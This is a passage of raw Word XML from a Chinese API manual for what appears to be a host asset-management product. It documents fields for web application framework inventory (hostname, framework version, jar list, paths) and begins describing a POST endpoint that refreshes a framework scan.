            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46951D96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="619CEABE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE66066" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B03F1EA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02930A8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E08CB24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="126610F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70A52832" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0EDE172F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31645947" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71C1C644" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E017DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D00482E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EBC63BF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="792C0CF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29FA1D9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B4F3819" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29280108" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54E7D6B8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C4BA068" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C557FBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171233DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="305C02E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7363D226" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D252E47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="766D4709" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594B1E07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31CBD2D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41F87B61" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5781F26A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F3DBB07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E3CD24F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E5D0794" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web应用框架名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EF0E78C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74A1FE12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="059CDD79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DE911D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215E6FBA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>框架版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B76F83F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AEFA972" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17444E1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32755DE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B9FC5E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>框架语言</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12F1FDE2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E1E4282" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29EA42DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B1385EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5705C20B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05DF8513" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68A5916E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>domainName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C909FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="659137BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F13CE56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>站点域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="447A7FDF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B00D67B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webAppDir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A312FD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C03ED3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DB14394" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>框架绝对路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60764054" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A8878A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jarCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5088CAE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ADCB08C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F6DC046" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>关联jar包数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B343BFC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="338EBCF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>jarList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05F34F02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="622AB0F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>version:varchar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">(128), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>absDir:varchar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(128),</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jarName:varchar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD36772" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>关联jar包详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36E7A8FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DEDF588" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webRoot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF14B16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FDA34F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="112E43B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>根路径（</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>、</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>django</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>框架字段）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="075A6BE4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="704A6A31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>workDir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71D8BECD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="231CB8FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FF14E6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用路径</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>、</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>django</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>框架字段）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32E9B776" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc115166121"/>
      <w:bookmarkStart w:id="94" w:name="web应用框架信息扫描"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r>
        <w:t>Web应用框架信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="4B2FF518" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求Web应用框架信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA81A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC6E4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58109E98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
